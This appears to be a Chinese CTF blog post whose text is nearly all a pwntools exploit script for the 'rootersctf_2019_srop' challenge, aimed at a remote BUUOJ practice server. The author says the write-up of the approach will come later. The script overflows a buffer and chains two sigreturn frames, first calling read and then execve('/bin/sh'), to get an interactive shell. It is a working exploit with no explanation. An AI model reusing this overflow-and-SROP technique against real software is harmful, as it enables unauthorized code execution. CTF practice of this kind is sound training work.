脚本先放着,思路空了再写

    1. #coding:utf8
    2. from pwn import *
    3. context.arch='amd64'
    4. context.log_level = 'debug'
    5. io = process("./rootersctf_2019_srop")
    6. io = remote("node4.buuoj.cn",27383)
    7. elf = ELF("./rootersctf_2019_srop")
    8. frame = SigreturnFrame()
    9. pop_rax_syscall_addr =0x0000000000401032   #pop rax
    10. syscall_addr = 0x401033
    11. data_addr=0x0000000000402000
    12. offest = 0x88
    13. frame.rax = 0
    14. frame.rdi = 0
    15. frame.rdx = 0x400
    16. frame.rsi = data_addr
    17. frame.rip = syscall_addr
    18. frame.rbp = data_addr+0x20
    19. payload = b'a'*offest + p64(pop_rax_syscall_addr)+p64(0xf)+str(frame)
    21. io.sendlineafter("Hey, can i get some feedback for the CTF?",payload)
    23. frame = SigreturnFrame()
    24. frame.rax=59
    25. frame.rip = syscall_addr
    26. frame.rdi = data_addr
    27. frame.rsi =0
    28. frame.rdx =0
    29. payload = "/bin/sh\x00"+b'a'*0x20+p64(pop_rax_syscall_addr)+p64(0xf)+str(frame)
    30. # gdb.attach(io)
    31. # pause()
    32. io.sendline(payload)
    33. io.interactive()